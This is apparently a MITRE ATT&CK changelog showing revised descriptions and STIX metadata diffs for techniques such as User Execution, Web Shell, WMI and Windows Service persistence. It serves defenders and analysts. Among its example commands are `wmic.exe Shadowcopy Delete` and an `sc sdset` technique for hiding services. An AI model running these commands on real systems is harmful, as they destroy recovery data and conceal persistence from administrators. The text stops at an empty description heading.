Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)

New Description
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)

For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
Details
values_changed
STIX Field / Old value / New value
modified: 2022-04-19 20:31:15.373000+00:00 → 2024-04-12 03:46:49.507000+00:00
description:
Old value: An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
New value: An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566). While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023) For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6
iterable_item_added
STIX Field / Old value / New value
external_references: {'source_name': 'Krebs Discord Bookmarks 2023', 'description': 'Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.', 'url': 'https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/'}
external_references: {'source_name': 'Talos Roblox Scam 2023', 'description': 'Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.', 'url': 'https://blog.talosintelligence.com/roblox-scam-overview/'}
x_mitre_contributors: Goldstein Menachem

[T1071.001] Application Layer Protocol: Web Protocols

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX Field / Old value / New value
modified: 2023-09-29 20:22:37.414000+00:00 → 2024-04-16 12:28:21.234000+00:00
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field / Old value / New value
x_mitre_platforms: Network

[T1505.003] Server Software Component: Web Shell

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)

New Description
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
Details
dictionary_item_removed
STIX Field / Old value / New value
x_mitre_system_requirements: ['Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.']
values_changed
STIX Field / Old value / New value
modified: 2023-03-30 21:01:53.223000+00:00 → 2024-04-16 12:45:06.434000+00:00
description:
Old value: Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
New value: Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW) In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[T1059.003] Command and Scripting Interpreter: Windows Command Shell

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX Field / Old value / New value
modified: 2023-07-28 17:50:21.947000+00:00 → 2024-03-01 17:35:02.889000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.3 → 1.4

[T1047] Windows Management Instrumentation

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)

New Description
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.

The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)

**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
Details
values_changed
STIX Field / Old value / New value
modified: 2023-07-24 20:38:58.283000+00:00 → 2024-04-11 18:13:25.130000+00:00
description:
Old value: Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
New value: Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI) An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6) **Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
external_references[3]['source_name']: MSDN WMI → Mandiant WMI
external_references[3]['description']: Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016. → Mandiant. (n.d.). Retrieved February 13, 2024.
external_references[3]['url']: https://msdn.microsoft.com/en-us/library/aa394582.aspx → https://www.mandiant.com/resources/reports
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.4 → 1.5
iterable_item_added
STIX Field / Old value / New value
external_references: {'source_name': 'WMI 6', 'description': 'Microsoft. (2022, June 13). BlackCat. Retrieved February 13, 2024.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/'}
external_references: {'source_name': 'WMI 1-3', 'description': 'Microsoft. (2023, March 7). Retrieved February 13, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN'}
external_references: {'source_name': 'WMI 7,8', 'description': 'Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February 13, 2024.', 'url': 'https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242'}
x_mitre_contributors: Tristan Madani
iterable_item_removed
STIX Field / Old value / New value
external_references: {'source_name': 'FireEye WMI SANS 2015', 'description': "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf'}

[T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

New Description
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)

Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe` – into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-21 12:32:38.796000+00:00 | 2024-04-13 14:08:20.882000+00:00
description | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. | Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015) Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe` –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018) WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
iterable_item_added
STIX Field | Old value | New Value
x_mitre_contributors |  | Viren Chaudhari, Qualys
x_mitre_data_sources |  | File: File Creation

[T1543.003] Create or Modify System Process: Windows Service

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).

New Description
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)
Details
values_changed
STIX Field | Old value | New Value
modified | 2023-09-15 16:42:25.014000+00:00 | 2024-04-11 19:25:51.394000+00:00
description | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). | Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component). Adversaries may also create ‘hidden’ services (i.e., [Hide Artifacts](https://attack.mitre.org/techniques/T1564)), for example by using the `sc sdset` command to set service permissions via the Service Descriptor Definition Language (SDDL). This may hide a Windows service from the view of standard service enumeration methods such as `Get-Service`, `sc query`, and `services.exe`.(Citation: SANS 1)(Citation: SANS 2)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.4 | 1.5
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'SANS 1', 'description': 'Joshua Wright. (2020, October 13). Retrieved March 22, 2024.', 'url': 'https://www.sans.org/blog/red-team-tactics-hiding-windows-services/'}
external_references |  | {'source_name': 'SANS 2', 'description': 'Joshua Wright. (2020, October 14). Retrieved March 22, 2024.', 'url': 'https://www.sans.org/blog/defense-spotlight-finding-hidden-windows-services/'}
x_mitre_contributors |  | Wirapong Petshagun

[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-08-14 15:11:30.220000+00:00 | 2024-02-14 21:24:37.780000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources |  | Process: Process Creation

Patches

[T1087] Account Discovery

Current version: 2.4


Old Description
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

New Description
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.

New Mitigations:

Details
values_changed
STIX Field | Old value | New Value
modified | 2023-04-15 17:24:23.029000+00:00 | 2024-01-12 23:36:56.245000+00:00
description | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files. | Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)). Adversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment. For examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
iterable_item_added
STIX Field | Old value | New Value
external_references |  | {'source_name': 'AWS List Users', 'description': 'Amazon. (n.d.). List Users. Retrieved August 11, 2020.', 'url': 'https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html'}
external_references |  | {'source_name': 'Google Cloud - IAM Servie Accounts List API', 'description': 'Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.', 'url': 'https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list'}

[T1098] Account Manipulation

Current version: 2.6


Old Description
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).

New Description
